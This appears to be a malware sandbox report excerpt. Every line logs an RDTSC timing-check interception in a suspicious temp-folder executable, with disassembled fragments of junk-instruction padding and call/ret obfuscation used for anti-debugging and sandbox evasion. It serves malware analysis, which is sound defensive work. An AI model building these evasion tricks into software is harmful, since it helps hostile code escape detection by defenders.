Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765539 second address: 765548 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 766445 second address: 766465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, dword ptr [ebp+122D2AF1h] 0x0000000e push 00000000h 0x00000010 mov ebx, ecx 0x00000012 push 00000000h 0x00000014 sub ebx, dword ptr [ebp+122D2B15h] 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 766465 second address: 76647B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007FB424542846h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765606 second address: 76560C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76560C second address: 765612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765612 second address: 76562C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76562C second address: 765636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 765636 second address: 76563A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 767317 second address: 767322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FB424542846h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 767322 second address: 767393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB4246CBDE8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D30D4h], edx 0x0000002a push eax 0x0000002b or bx, 6BBAh 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 jmp 00007FB4246CBDEDh 0x00000038 push 00000000h 0x0000003a mov ebx, ecx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jnc 00007FB4246CBDE6h 0x00000045 jnl 00007FB4246CBDE6h 0x0000004b popad 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FB4246CBDF5h 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76920A second address: 769210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769210 second address: 769216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7698E2 second address: 769977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB424542858h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jc 00007FB424542848h 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 jmp 00007FB424542851h 0x0000001d pop ecx 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FB424542848h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a sub edi, 3C893B24h 0x00000040 push 00000000h 0x00000042 or dword ptr [ebp+1248120Ah], edx 0x00000048 sub dword ptr [ebp+122D30DDh], ecx 0x0000004e push 00000000h 0x00000050 or bx, C321h 0x00000055 js 00007FB424542847h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FB42454284Eh 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769977 second address: 769981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76A993 second address: 76A9BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007FB424542854h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76A9BB second address: 76AA50 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB4246CBDE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FB4246CBDE8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jl 00007FB4246CBDECh 0x0000002b mov dword ptr [ebp+122D3041h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FB4246CBDE8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov bx, ax 0x00000050 movzx ebx, bx 0x00000053 push 00000000h 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FB4246CBDE8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jp 00007FB4246CBDE8h 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 767565 second address: 76756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76756C second address: 767585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007FB4246CBDE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnp 00007FB4246CBDF4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76BA80 second address: 76BA98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769B6C second address: 769B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 769B70 second address: 769B83 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FB424542846h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76C91A second address: 76C91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76BBBE second address: 76BC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D28E1h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FB424542848h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FB424542848h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 sub bl, FFFFFFDAh 0x00000054 movzx ebx, cx 0x00000057 mov eax, dword ptr [ebp+122D0491h] 0x0000005d mov dword ptr [ebp+12462AA9h], edx 0x00000063 mov dword ptr [ebp+122D33F7h], ecx 0x00000069 push FFFFFFFFh 0x0000006b mov dword ptr [ebp+122D2D98h], esi 0x00000071 jmp 00007FB424542859h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b push ecx 0x0000007c pop ecx 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76BC5B second address: 76BC61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 771DEC second address: 771DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB424542848h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 771DFC second address: 771E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 707D13 second address: 707D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 707D19 second address: 707D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 776415 second address: 776419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 776419 second address: 776424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 775EB9 second address: 775F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FB424542846h 0x0000000c popad 0x0000000d jg 00007FB42454285Eh 0x00000013 jmp 00007FB424542858h 0x00000018 popad 0x00000019 push ebx 0x0000001a jg 00007FB424542863h 0x00000020 jbe 00007FB424542846h 0x00000026 jmp 00007FB424542857h 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e pop esi 0x0000002f jmp 00007FB424542851h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 775F1E second address: 775F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A6EC second address: 77A6F6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A6F6 second address: 77A71C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A71C second address: 77A722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A722 second address: 77A74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FB4246CBDF6h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 77A855 second address: 77A85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB424542846h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 76CB22 second address: 76CB2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7802A6 second address: 7802C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB424542859h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780469 second address: 78046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7808E8 second address: 7808F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB424542846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7808F4 second address: 78091B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4246CBDF9h 0x00000009 jmp 00007FB4246CBDEAh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78091B second address: 78091F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78091F second address: 780928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780CF0 second address: 780D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB424542857h 0x0000000d pushad 0x0000000e ja 00007FB424542846h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780D18 second address: 780D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780D1E second address: 780D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780D23 second address: 780D2D instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4246CBDF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780E94 second address: 780E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780E9A second address: 780EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780EA0 second address: 780EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 780EA4 second address: 780EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4246CBDECh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jne 00007FB4246CBDE6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e jmp 00007FB4246CBDEDh 0x00000023 push eax 0x00000024 push edx 0x00000025 js 00007FB4246CBDE6h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 784246 second address: 78424B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A14E second address: 75A197 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4246CBDF4h 0x00000008 jmp 00007FB4246CBDEEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FB4246CBDF1h 0x00000015 nop 0x00000016 sbb dx, A4E7h 0x0000001b lea eax, dword ptr [ebp+1248EF3Dh] 0x00000021 add dx, 3AF4h 0x00000026 cld 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jns 00007FB4246CBDE6h 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A197 second address: 75A19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A19D second address: 75A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A1A1 second address: 7399E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ecx, esi 0x00000010 sub dword ptr [ebp+122D1996h], ebx 0x00000016 call dword ptr [ebp+122D1DB2h] 0x0000001c push edi 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FB424542858h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A77A second address: 75A780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A780 second address: 75A797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007FB424542846h 0x00000010 je 00007FB424542846h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A797 second address: 75A7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB4246CBDE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A7A1 second address: 75A7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB42454284Dh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A8F2 second address: 75A8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75A976 second address: 75A97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB36 second address: 75AB50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4246CBDEEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB50 second address: 75AB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB54 second address: 75AB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AB5A second address: 75AB60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AD6E second address: 75AD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4246CBDEAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AD96 second address: 75ADA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B031 second address: 75B036 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B405 second address: 75B46E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB424542848h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D20A6h], eax 0x0000002a lea eax, dword ptr [ebp+1248EF81h] 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FB424542848h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov ch, 37h 0x0000004c push eax 0x0000004d jc 00007FB424542858h 0x00000053 push eax 0x00000054 push edx 0x00000055 jnl 00007FB424542846h 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B46E second address: 75B472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B501 second address: 75B50F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB424542846h 0x0000000e rdtsc
